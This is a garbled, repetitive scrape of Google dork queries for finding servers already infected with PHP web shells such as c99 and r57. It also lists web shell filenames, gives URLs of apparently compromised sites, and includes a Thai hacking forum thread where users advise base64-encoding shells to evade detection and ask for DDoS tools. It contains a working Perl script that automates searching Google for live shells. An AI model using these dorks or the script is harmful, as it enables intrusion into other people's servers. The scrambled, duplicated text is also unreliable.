intitle:c99shell filetype:php powered by Captain Crunch Security Team powered by Captain Crunch Security Team C99Shell v. 1.0 pre-release build #12 c99shell v.1.0 allinurl:c99.php "c99shell v. 1.0 pre-release build" inurl:"c99.php" filetype:php "c99shell v. 1.0 " ok c99.php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout c99shell v. 1.0 pre-release build #16 | !C99Shell v. 1.0 pre-release build #5! !C99Shell v. 1.0 pre-release build #5! allinurl:/c99.php powered by Captain Crunch Security Team inurl:c99.php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php powered by Captain Crunch Security Team inurl:c99.php C99Shell v. 1.0 pre-release inurl:c99.php inurl:c99.php ext:php inurl:"c99.php" allinurl:"c99.php" Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout powered by Captain Crunch Security Team Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout" C99Shell v. 1.0 pre-release build #16 software apache Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout "c99shell v 1.0" inurl:"c99.php" allintitle: C99shell filetype:php C99Shell v. 1.0 pre-release build #16! "c99shell v. 1.0 pre-release" c99shell v. 1.0 pre-release build #5 allinurl:"c99.php" filetype:php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout !C99Shell v. 1.0 pre-release build #16! inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname inurl:c99.php c99shell v. 1.0 allinurl: c99.php --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- inurl:"/c99.php" c99shell +uname c99shell php + uname c99shell php + uname --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- allinurl:c99.php !C99Shell v. 1.0 pre-release build #5! C99Shell v.1.0 pre-release Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:c99.php intitle:c99shell filetype:php "Encoder Tools Proc. FTP brute" "c99" filetype:php intext:"Safe-Mode: OFF" c99shell v. 1.0 pre inurl:c99.php intitle:c99shell uname -bbpress intitle:"index.of" c99.php inurl:admin/files/ intitle:"index of /" "c99.php" intitle:"index of" intext:c99.php intitle:index.of c99.php intitle:"index of" + c99.php intitle:index/of file c99.php intitle:index/of file c99.php index of /admin/files/ intitle:"Index of/"+c99.php c99.php "intitle:Index of " c99.php "intitle:Index of " c99.php "intitle:Index of " intitle:index.of c99.php img/c99.php intitle:index.of c99.php img.c99.php intitle:"Index of/"+c99.php "index of /" c99.php c99.php intitle:"Index of" c99.php "index of" c99.php "Index of/"+c99.php ============================================================================ inurl:c99.php uid=0(root) call o- call of duty france-clan fc etqw france clan nintendo dsi c- cracké une console wii etqw fc france-clan.com inurl:c-upload.php inurl:r57.php r57shell :: go dir ::. allinurl:c99.php allinurl:r57.phpphpinfo c99shell display1 c99shell rw-- -- -- c99shell rwxrwxrwx clan france cod ============================================================================ !C99Shell v. 1.0 beta (21.05.2005)! c99shell powered by admin c99madshell !C99Shell v. 1.0 beta !C99Shell v. 1.0 pre-release build c99shell v. 1.3 pre-release build C99Shell v. 2.0.x beta c99. PHP-code Feedback Self remove c99. PHP-code Feedback Self remove c99shell uname C99Shell v. 1.4 pre-release build !C99Shell v. 1.0 beta (21.05.2005)! c99shell safe mode:on W4-c99.php c99_madnet.php c99_locus7s.php c99shell #16 backdoor_fr.php phpjackal.php PHPRemoteView.php webshell.php c99_w4cking.php Private-i3lue.php mysql_shell.php h4ntu shell [powered by tsoi].php r57shell.php GFS web-shell ver 3.1.7 - PRiV8.php backdoor.php php-include-w-shell.php SnIpEr_SA Shell.php load_shell.php x2300.txt cybershell.php elmuh.php myshell.php ver.php mysql_tool.php rootshell (2).php shell.php backupsql.php Mysql interface v1.0.php NCC-Shell.php dC3 Security Crew Shell PRiV.php PHP Shell.php pws.php ebypass.php nstview.php PH Vayv.php Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php lamashell.php s72 Shell v1.1 Coding.php Crystal.php gfs_sh.php c99_madnet.php rootshell.php aZRaiLPhp v1.0.php phpbackdoor.php ru24_post_sh.php ****phpshell.php r57_Mohajer22.php su.php SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php KAdot Universal Shell v0.1.6.php phpshell17.php nshell.php DTool Pro.php zacosmall.php Worse Linux Shell.php nstview (2).php SimShell 1.0 - Simorgh Security MGZ.php Dive Shell 1.0 - Emperor Hacking Team.php matamu.php WinX Shell.php r57_iFX.php kobrashell.php Dx.php JspWebshell 1.2.php ctt_sh.php r57.php mysql.php pHpINJ.php Safe0ver Shell -Safe Mod Bypass By Evilc0der.php r57_kartal.php iMHaPFtp.php NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php c100.php simple_cmd.php sql-shell.php NetworkFileManagerPHP.php MySQL Web Interface Version 0.8.php Uploader.php simple-backdoor.php PHANTASMA.php nr.php Moroccan Spamers Ma-EditioN By GhOsT.php ironshell.php Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php kruis.php c99_locus7s.php ============================================================================ 33 28.45% powered by captain crunch security team 6 5.17% safe-mode: off (not secure) 5 4.31% home 4 3.45% basel 2.2 4 3.45% safe-mode: off (not secure) drwxrwxrwx 3 2.59% c99memoryl 3 2.59% c99shell [file on secure ok ] 3 2.59% c99shell v. 1.0 pre-release build #16 3 2.59% hacker 3 2.59% uid=99(nobody) gid=99(nobody) groups=99(nobody) 2 1.72% –[ c99shell v. 1.0 pre-release build #16 2 1.72% basel 2 1.72% c99shell v. 1.0 pre-release build 2 1.72% powered by captain crunch security team | http://ccteam.ru | 2 1.72% safe-mode : off ( not secured ) drwxrwxrwx 2 1.72% safe-mode: off (not secure) drwxrwxrwx c99shell 1 0.86% !c99shell v. 1.0 pre-release build #16! 1 0.86% –[ c99shell v. 1.0 pre-release build 1 0.86% -[ c99shell v. 1.0 pre-release build #16 powered by captain cru 1 0.86% /opt/zope/lib/python/zdaemon/zdrun.py 1 0.86% allintext:”safe-mode: off (not secure)” 1 0.86% allinurl:selfremove 1 0.86% basel documentation 1 0.86% c99memory.php 1 0.86% c99shell safe-mode : off ( not secured ) drwxrwxrwx 1 0.86% c99shell v. 1.0 pre-release build #16 powered by captain crunch 1 0.86% c99shell v. 1.0 pre-release uname 1 0.86% c99shell v. pre-release build 1 0.86% captain crunch security team 1 0.86% code safe-mode: off (not secure) drwxrwxrwx c99shell 1 0.86% drwxrwxrwx c99shell filetype:php 1 0.86% encoder bind proc. ftp brute sec. sql php-code feedback self re 1 0.86% encoder tools proc. ftp brute sec. sql php-code update feedback 1 0.86% home updir search buffer tools proc ftp brute sec sql self remo 1 0.86% how to restore using !c99memory v. 1.0 pre-release build #16! 1 0.86% intext:c99memory v. 1.0 1 0.86% intext:safe-mode: off (not secure) 1 0.86% intext:safe-mode: off (not secure) tooling 1 0.86% inurl:act=sql 1 0.86% name asc. size · modify · owner/group · perms action 1 0.86% php safe-mode drwxrwxrwx 1 0.86% php4 timezone database 1 0.86% powered by captain crunch security team drwxrwxrwx 1 0.86% powered by captain crunch security team | http://ccteam.ru 1 0.86% safe mode: off ( not secure ) 1 0.86% safe mode: off (not secure) 1 0.86% safe-mode: off (not secure) / tmp/ drwxrwxrwx 1 0.86% safe-mode: off (not secure) site:pt 1 0.86% shell powered by captain crunch security team 1 0.86% site:www.astro.mat.uc.pt basel 1 0.86% uid= gid= groups= sql uname -a 1 0.86% uid=99 ( nobody ) gid=99 ( nobody ) 1 0.86% uid=99(nobody) gid=99(nobody) groups=99(nobody)safe-mode: off ( ============================================================================ ใช้ Google หา shell (new) intitle:c99shell uname c99shell v.1.0 (roots) intitle:C99Shell ccteam.ru c99.php intext:c99shell inurl:c99.php –[ c99shell v. 1.0 pre-release build #16 "inurl:c99.php" + "intext:safe" --[ c99shell v. 1.0 pre-release build #12 powered by Captain Crunch Security Team c99shell safe-mode : off ( not secured ) drwxrwxrwx C99Shell v. 1.0 pre-release build #12 (intitle:r57shell | intitle:c99shell) +uname !C99Shell v. 1.0 pre-release build # +php -htm -html -shtml intitle:C99Shell v. 1.0 pre-release +uname c99shell powered by admin Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout safe-mode: off (not secure) / tmp/ drwxrwxrwx bboyboo 12-8-2008 10:58 มันเอาไว้ทำไหนหรอครับ petzaun 12-8-2008 11:13 ขอบคุนมากๆครับ ปล.shellคือประตูหลังที่ทำไว้หลังจากเจาะเข้าระแบบได้แล้ว netlose 12-8-2008 11:34 ไม่ต้องออกแรงให้เมื่อย แต่เหมือนว่าไปใช้ของเขา แบบนี้ก็ไม่ใช่ hacker สิ chaturaphut 12-8-2008 11:47 *** เจ้าของกระทู้ถูกแบนหรือถูกลบ *** death_13 12-8-2008 13:02 เดี๋ยวนี้เว็บใหม่ ๆ วาง shell ไม่ค่อยได้ ผมขอแนะนำให้เอา shell ไปเข้ารหัสก่อนครับแล้วค่อยวาง NASMAS 12-8-2008 17:58 [quote]ต้นฉบับโพสโดย [i]death_13[/i] เมื่อ 12-8-2008 13:02 [url=http://www.thaishadow.com/redirect.php?goto=findpost&pid=14190&ptid=2649][img]http://www.thaishadow.com/images/common/back.gif[/img][/url] เดี๋ยวนี้เว็บใหม่ ๆ วาง shell ไม่ค่อยได้ ผมขอแนะนำให้เอา shell ไปเข้ารหัสก่อนครับแล้วค่อยวาง ... [/quote] ขอบคุณอ่ะคับ keebin 12-8-2008 19:36 [quote]ต้นฉบับโพสโดย [i]death_13[/i] เมื่อ 12-8-2008 13:02 [url=http://www.thaishadow.com/redirect.php?goto=findpost&pid=14190&ptid=2649][img]http://www.thaishadow.com/images/common/back.gif[/img][/url] เดี๋ยวนี้เว็บใหม่ ๆ วาง shell ไม่ค่อยได้ ผมขอแนะนำให้เอา shell ไปเข้ารหัสก่อนครับแล้วค่อยวาง ... [/quote] Encryption Base64 Only In Header & Footter Script Now! :victory: :lol :victory: nitrous123 12-8-2008 21:43 [quote]ต้นฉบับโพสโดย [i]death_13[/i] เมื่อ 12-8-2008 13:02 [url=http://www.thaishadow.com/redirect.php?goto=findpost&pid=14190&ptid=2649][img]http://www.thaishadow.com/images/common/back.gif[/img][/url] เดี๋ยวนี้เว็บใหม่ ๆ วาง shell ไม่ค่อยได้ ผมขอแนะนำให้เอา shell ไปเข้ารหัสก่อนครับแล้วค่อยวาง ... [/quote] ที่สำคัญ "ทำยังไง" อิอิ hackermax 13-8-2008 19:24 ได้shellแล้ว จะเอาไงกันต่อดีหว่า อยากได้ไอ้ตัวยิง ddos อะครับ ท่านใดมีช่วยสงเคราะห์ด้วยเด้อ angra 17-8-2008 02:45 วะว้าว สบายเลย อิอิ thanks มากครับ winter 28-8-2008 13:17 thank thank thank :o :o :o maza__com21 26-9-2008 14:55 ขอบคุณคับผมหุหุหุหุหุหุหุหุหุหุหุหุหุ napasatan 23-10-2008 12:55 ขอบคุณมากครับ ใช้ง่าย สบายดีจริง เดี๋ยวนี้ ลุงกูเกิ้ล เค้าสนับสนุนการแฮกขนาดนี้เลยเหรอครับ :lol "C99Shell v. 1.0 pre" =C99Shell v. 1.0 pre-release ========== fuck php drwxrwxrwx uid=0(root) gid=0(root) =================================== # search site: c99.php # # ============================ # # d=99(nobody) gid=99(nobody) groups=99(nobody)Safe-mode: OFF (not secure) # # # ================================= # # c99.php =ls # # =============================== # # (root)|root& # # =========================== # # (root-0-999)|N765-30-10|0 # # ==================== # # # (root)%7croot& # # ======================== # # root root drwx # # ============================ # # PostgreSQL: OFF c99.php # # ====================== # # # powered by Captain Crunch Security Team inurl:/c99.php # # # # inurl:/c99.php C99Shell v. 1.0 pre-release build #12 C99Shell v. # # # ----------------------------- # # allintext: [ ] [ SQL ] [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ] # # ============================================================= # # c99.php Safe-mode: OFF (not secure) 19.09.2008 # # ======================================== # # intitle:!C99Shell v. 1.0 pre-release build #16! root # # (r # # # root c99.php # # inurl:c99.php uid=0(root) # # c99 shell v.1.0 (roots) # # # intitle:"c99shell" filetype:php root # # # # !C99Shell v. 1.0 pre-release build #16! root !!~~ # # # search site: uid=0(root) Safe-mode: OFF # # # ======================================================= # # inurl:c99.php Safe-mode: OFF (not secure) # ili # inurl:c99.php Safe-mode: ON # ili # inurl:r57.php Safe_mode: OFF # ili # inurl:r57.php Safe_mode: ON # ili # intitle:.com - phpshell # ili # intitle:.org - phpshell # ili # inurl:.com - ashshell # ili # intitle:.org - Locus7Shell # ili # intitle:.com - Locus7Shell # # ======================================================== # # # c99.php root/root # # # ============================ # # # # lrwxrwxrwx 1 root root # # # ================================= # # Owned by hacker # # # # =================================== # # # # #!/usr/bin/perl # # use strict; # use warnings; # use LWP::UserAgent; # # usage() unless $ARGV[2]; # # my @searchTerm; # my @checkTerm; # # if(lc($ARGV[0]) eq "r57") { # push(@searchTerm, "inurl:r57.php"); # push(@searchTerm, "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\""); # push(@searchTerm, "intitle:r57shell"); # push(@checkTerm, "r57"); # push(@checkTerm, "safe_mode"); # } elsif(lc($ARGV[0]) eq "c99") { # push(@searchTerm, "inurl:c99.php"); # push(@searchTerm, "\"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout\""); # push(@searchTerm, "intitle:\" - phpshell\""); # push(@searchTerm, "intitle:\" - c99shell\""); # push(@checkTerm, "c99"); # push(@checkTerm, "Safe-mode"); # } elsif(lc($ARGV[0]) eq "mys") { # push(@searchTerm, "\"Auto error traping enabled\""); # push(@searchTerm, "intitle:\"MyShell 1.1.0 build 20010923\""); # push(@checkTerm, "MyShell"); # push(@checkTerm, "Echo commands"); # } elsif(lc($ARGV[0]) eq "phs") { # push(@searchTerm, "intitle:\"PHP Shell 1.5\""); # push(@searchTerm, "intitle:\"PHP Shell 1.6\""); # push(@searchTerm, "intitle:\"PHP Shell 1.7\""); # push(@searchTerm, "\"Enable stderr-trapping?\""); # push(@checkTerm, "PHP Shell"); # push(@checkTerm, "Choose new working"); # } elsif(lc($ARGV[0]) eq "phm") { # push(@searchTerm, "\"PHPShell by Macker\""); # push(@searchTerm, "\"[ Main Menu ] [ PHPKonsole ] [ Haxplorer ]\""); # push(@checkTerm, "Haxplorer"); # push(@checkTerm, "PHPKonsole"); # } elsif(lc($ARGV[0]) eq "rem") { # push(@searchTerm, "intitle:\"phpRemoteView: \""); # push(@searchTerm, "\"REMVIEW TOOLS\""); # push(@checkTerm, "phpRemoteView"); # push(@checkTerm, "perms"); # } # # if(!@searchTerm) { # print "Error: [shell to find] is a unknown shell\n" and die; # } # # my $outputOn; # # if(lc($ARGV[1]) eq "on") { # $outputOn = 1; # } elsif(lc($ARGV[1]) eq "off") { # $outputOn = 0; # } else { # print "Error: [screen output] must be \"on\" or \"off\"\n" and die; # } # # my $outputFile; # # if(index(lc($ARGV[2]), ".htm") > 0) { # $outputFile = $ARGV[2]; # } else { # print "Error: [output HTML file] must be *.htm or *.html\n" and die; # } # # open(FILEHANDLE, ">$outputFile"); # print FILEHANDLE "\n"; # close FILEHANDLE; # # my $userAgent = LWP::UserAgent->new; # $userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5"); # # my @resultLinks; # # foreach(@searchTerm) { # print "[*] Query for \"$_\"\n" if($outputOn == 1); # # my $isLastPage = 0; # # for(my $gPage = 0; ; $gPage++) { # if($isLastPage == 1) { last; } # # my $gRequest = HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0"); # my $gResource = $userAgent->request($gRequest); # # if($gResource->is_success) { # my @gContent = split(" # ", $gResource->content); # if(@gContent < 10) { $isLastPage = 1; }; # # for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) { # my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href=\"") + 6); # $shellLink = substr($shellLink, 0, index($shellLink, "\"")); # # print "[*] Check status of site \"$shellLink\"\n" if($outputOn == 1); # # my $sRequest = HTTP::Request->new(GET => $shellLink); # my $sResource = $userAgent->request($sRequest); # # if($sResource->is_success) { # if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) { # open(FILEHANDLE, ">>$outputFile"); # print FILEHANDLE "Link: $shellLink # \n"; # print FILEHANDLE "Search Term: $_ # # \n"; # close FILEHANDLE; # # print "[+] Found shell: $shellLink\n" if($outputOn == 1); # } else { # print "[-] No shell\n" if($outputOn == 1); # } # } else { # print "[-] Offline\n" if($outputOn == 1); # } # } # # sleep 20; #wait 20 seconds so google dont think we are a bot # } else { # print "Unable to query google\n" and die; # } # } # } # # open(FILEHANDLE, ">>$outputFile"); # print FILEHANDLE " # # Find PHP Shells via Google - by DiA/RRLF # "; # close FILEHANDLE; # # sub usage { # print qq( # Find PHP Shells via Google - by DiA/RRLF (http://www.vx-dia.de.vu) # # Usage: perl $0 [shell to find] [screen output] [output HTML file] # [shell to find] can be: # r57 - find r57shell # c99 - find c99shell # mys - find MyShell # phs - find PHP Shell # phm - find PHPShell (Macker) # rem - find phpRemoteView # [screen output] can be: # on - every step the script doas get printed on the screen # off - no output, the script just writes to the output file # [output HTML file] must be: # *.htm or *.html # # Example: perl $0 c99 on c99shells.htm # perl $0 mys off manyshells.htm # # ) and exit; # } # # # ============================================================= =*-*c99shell # C99Shell v. 1.0 pre-release build #16 # C99Shell v. 1.0 pre-release build Safe-mode: OFF (not secure) # C99Shell v. 1.4 pre-release build # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback # c99 shell pre-release safe mode:off not secure # c99Shell Unselect # c99Shell drwxr-xr-x # c99shell *ok* # c99shell 1.4 # c99shell Apache # c99shell Make Dir [ok] # c99shell apache # c99shell drwx # c99shell php uname # c99shell powered by Captain Crunch Security Team # c99shell powered by captain crunch security team # c99shell safe mode uname # c99shell v 1.0 # c99shell v 1.0 pre release build # c99shell v. 1.0 pre-release build #16 powered by captain crunch # cih.ms # filetype: c99shell # http://www.altair-altai.ru/content/view/25/42/ # intext:owned by hacker # intitle:c99shell root # ok c99shell uname # uname-a: linux c99shell 2008 # www.altair-altay.ru # www/altair-altai/ru # ================================ # # # inurl:c99.php # inurl:c99.php uid=0(root) # root c99.php # "Captain Crunch Security Team" inurl:c99 # download c99.php # download c99.php # download c99.php # inurl:c99.php # inurl:c99.php # allinurl: c99.php # inurl:c99.php # allinurl: c99.php # inurl: /c99.php" # allinurl: c99.php # inurl:c99.php # inurl:"c99.php" c99shell # # ==================================================== # # safe-mode: off (not secure) drwxrwxrwx c99shell # inurl:c99.php # inurl:c99.php uid=0(root) # root c99.php # "Captain Crunch Security Team" inurl:c99 # download c99.php # download c99.php # download c99.php # inurl:c99.php # inurl:c99.php # allinurl: c99.php # inurl:c99.php # allinurl: c99.php # inurl:"/c99.php" # allinurl: c99.php # inurl:c99.php # inurl:"c99.php" c99shell # inurl:c99.php uid=0(root) # c99shell powered by admin # c99shell powered by admin # inurl:"/c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # c99 shell v.1.0 (roots) # inurl:c99.php # allintitle: "c99shell" # inurl:"c99.php # inurl:"c99.php # allinurl: "c99.php" # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # intitle:C99Shell v. 1.0 pre-release +uname # allinurl: "c99.php" # inurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:"c99.php" c99shell # inurl:c99.php # inurl:"c99.php" # allinurl:c99.php # inurl:"/c99.php # inurl:c99.php? # inurl:/c99.php+uname # allinurl:"c99.php" # allinurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # allinurl:c99.php # allinurl:c99.php? # allinurl:c99.php? # allinurl:c99.php? # "inurl:c99..php" # allinurl:c99.php # c99shell [file on secure ok ]? # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # powered by Captain Crunch Security Team # allinurl:c99.php # "c99.php" filetype:php # allinurl:c99.php # inurl:c99.php # allinurl:.c99.php # "inurl:c99.php" # c99. PHP-code Feedback Self remove # allinurl:c99.php # download c99.php # allinurl:c99.php # inurl:c99.php # allinurl: "c99.php" # allinurl:c99.php # allinurl:c99.php # c99shell # inurl:c99.php # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # allinurl:"c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # safe-mode: off (not secure) drwxrwxrwx c99shell # inurl:/c99.php # inurl:"c99.php" # inurl:c99.php # inurl:c99.php # c99.php download # inurl:c99.php # inurl:"c99.php" # inurl:/c99.php # inurl:"c99.php?" # inurl:c99.php # inurl:c99.php # files/c99.php # c99shell filetype:php -echo # c99shell powered by admin # inurl:c99.php # inurl:c99.php # inurl:"c99.php" # inurl:c99.php uid=0(root) # allinurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # inurl:"/c99.php" intitle:"C99shell" # inurl:"/c99.php" intitle:"C99shell" # inurl:"/c99.php" intitle:"C99shell" # C99Shell v. 1.0 pre-release build #5 # inurl:c99.php # inurl:c99.php # --[ c99shell v. 1.0 pre-release build #16 # c99shell linux infong # c99shell linux infong # C99Shell v. 1.0 pre-release build # !C99Shell v. 1.0 beta! # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # !c99shell v. 1+Safe-mode: OFF (not secure) # "C99Shell v. 1.0 pre-release build " # intitle:c99shell +filetype:php # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # intitle:!C99Shell v. 1.0 pre-release build #16! root # !C99Shell v. 1.0 pre-release build #5! # inurl:"c99.php" # C99Shell v. 1.0 pre-release build #16! # c99shell v. 1.0 pre-release build #16 # intitle:c99shell intext:uname # allintext:C99Shell v. 1.0 pre-release build #12 # c99shell v. 1.0 pre-release build #16 # --[ c99shell v. 1.0 pre-release build #15 | Powered by ]-- # allinurl: "c99.php" # allinurl: "c99.php" # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # "c99shell v 1.0" # ftp apache inurl:c99.php # c99shell+v.+1.0 16 # C99Shell v. 1.0 pre-release build #16 download # intitle:c99shell "Software: Apache" # allinurl: c99.php # allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # powered by Captain Crunch Security Team # powered by Captain Crunch Security Team # !C99Shell v. 1.0 pre-release build #5! # c99shell v. 1.0 release security # c99shell v. 1.0 pre-release build # inurl:c99.php # c99shell [file on secure ok ]? # C99Shell v. 1.3 # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php uid=0(root) # powered by Captain Crunch Security Team # C99Shell v. 1.0 pre-release build #16 # c99shell[on file]ok # c99shell[file on ]ok # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # "C99Shell v. 1.0 pre" # =C99Shell v. 1.0 pre-release # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # c99shell v. pre-release build # inurl:c99.php c99 shell # inurl:c99.php c99 shell # powered by Captain Crunch Security Team # inurl:c99.php # inurl:c99.php # !C99Shell v. 1.0 pre-release build #5! # intitle:"c99shell" filetype:php root # intitle:"c99shell" Linux infong 2.4 # C99Shell v. 1.0 beta ! # C99Shell v. 1.0 pre-release build # # inurl:"c99.php" # allintext:C99Shell v. 1.0 pre-release build #12 # "C99Shell v. 1.0 pre" # powered by Captain Crunch Security Team # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:/c99.php? # allinurl:c99.php # intitle:C99Shell pre-release # inurl:"c99.php" # powered by Captain Crunch Security Team # inurl:c99.php # C99Shell v. 1.0 pre-release build #16! # allinurl:c99.php # C99Shell v. 1.0 pre-release build #16 administrator # intitle:c99shell filetype:php # powered by Captain Crunch Security Team # powered by Captain Crunch Security Team # C99Shell v. 1.0 pre-release build #12 # c99shell v.1.0 # allinurl:c99.php # "c99shell v. 1.0 pre-release build" # inurl:"c99.php" filetype:php # "c99shell v. 1.0 " # ok c99.php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # c99shell v. 1.0 pre-release build #16 | # !C99Shell v. 1.0 pre-release build #5! # !C99Shell v. 1.0 pre-release build #5! # allinurl:/c99.php # powered by Captain Crunch Security Team # inurl:c99.php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # powered by Captain Crunch Security Team # inurl:c99.php # C99Shell v. 1.0 pre-release # inurl:c99.php # inurl:c99.php ext:php # inurl:"c99.php" # allinurl:"c99.php" # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # powered by Captain Crunch Security Team # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout" # C99Shell v. 1.0 pre-release build #16 software apache # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # "c99shell v 1.0" # inurl:"c99.php" # allintitle: C99shell filetype:php # C99Shell v. 1.0 pre-release build #16! # "c99shell v. 1.0 pre-release" # c99shell v. 1.0 pre-release build #5 # allinurl:"c99.php" filetype:php # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # !C99Shell v. 1.0 pre-release build #16! # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # inurl:c99.php # c99shell v. 1.0 # allinurl: c99.php # --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- # inurl:"/c99.php" # c99shell +uname # c99shell php + uname # c99shell php + uname # --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]-- # allinurl:c99.php # !C99Shell v. 1.0 pre-release build #5! # C99Shell v.1.0 pre-release # Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout # inurl:c99.php # intitle:c99shell filetype:php # "Encoder Tools Proc. FTP brute" # "c99" filetype:php intext:"Safe-Mode: OFF" # c99shell v. 1.0 pre # inurl:c99.php # intitle:c99shell uname -bbpress # intitle:"index.of" c99.php # inurl:admin/files/ # intitle:"index of /" "c99.php" # intitle:"index of" intext:c99.php # intitle:index.of c99.php # intitle:"index of" + c99.php # intitle:index/of file c99.php # intitle:index/of file c99.php # index of /admin/files/ # intitle:"Index of/"+c99.php # c99.php "intitle:Index of " # c99.php "intitle:Index of " # c99.php "intitle:Index of " # intitle:index.of c99.php # img/c99.php # intitle:index.of c99.php # img.c99.php # intitle:"Index of/"+c99.php # "index of /" c99.php # c99.php # intitle:"Index of" c99.php # "index of" c99.php # "Index of/"+c99.php # # =========================================================== # # # inurl:c99.txt? # # inurl:r57.txt? inurl:sniper-sa.txt? # # ===== # # inurl:c99+uname # # inurl:r57+uname # # inurl:sniper-sa+uname # # # =========================== # # # c99shell # # C99SHELL # # c99shell /=(5) # # - c99shell [ ok ] # # --[ c99shell modded by . 2 ]-- # # # C99Shell # # c99shell modded by # # c99shell modded by w4ck1ng # # c99shell modded by w4ck1ng. | w4ck1ng-shell # # c99shell=[ok] # # tr index php c99shell # # w4ck1ng c99shell # # ================================================ # http://w7ed.by.ru/c99.txt # # # =============================================== # # # uid=99(nobody) gid=99(nobody) groups=99(nobody). Safe-mode: OFF (not secure) # # ============================================= # # # # RAR! # Gif89a # # # --------- # # gif89a.php # # --------- # # :: Create folder :: Create file :: Read file if safe mode is Off ::"; if($os=="unix"){ print "PS table ::"; } # # ======================================================== # # # Safe Mode OFF (?) # # http://aquafitness.gr/~willboar/c100.php # # http://www.iyi.gen.tr/admin/c99 ... # # http://www.google.com.mx/search? # hl=es&q=inurl:r57.php&start=80&sa=N jajaja :o # # ============================================================ # # [HIDE] inurl:c99.php # inurl:c99.php uid=0(root) # root c99.php # "Captain Crunch Security Team" inurl:c99 # download c99.php # download c99.php # download c99.php # inurl:c99.php # inurl:c99.php # allinurl: c99.php # inurl:c99.php # allinurl: c99.php # inurl:"/c99.php" # allinurl: c99.php # inurl:c99.php # inurl:"c99.php" c99shell # inurl:c99.php uid=0(root) # c99shell powered by admin # c99shell powered by admin # inurl:"/c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # c99 shell v.1.0 (roots) # inurl:c99.php # allintitle: "c99shell" # inurl:"c99.php # inurl:"c99.php # allinurl: "c99.php" # inurl:c99.php # intitle:C99Shell v. 1.0 pre-release +uname # intitle:C99Shell v. 1.0 pre-release +uname # allinurl: "c99.php" # inurl:c99.php # inurl:"c99.php" # inurl:"c99.php" # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:c99.php # inurl:"c99.php" c99shell # inurl:c99.php # inurl:"c99.php" # allinurl:c99.php # inurl:"/c99.php # inurl:c99.php? # inurl:/c99.php+uname # allinurl:"c99.php" # 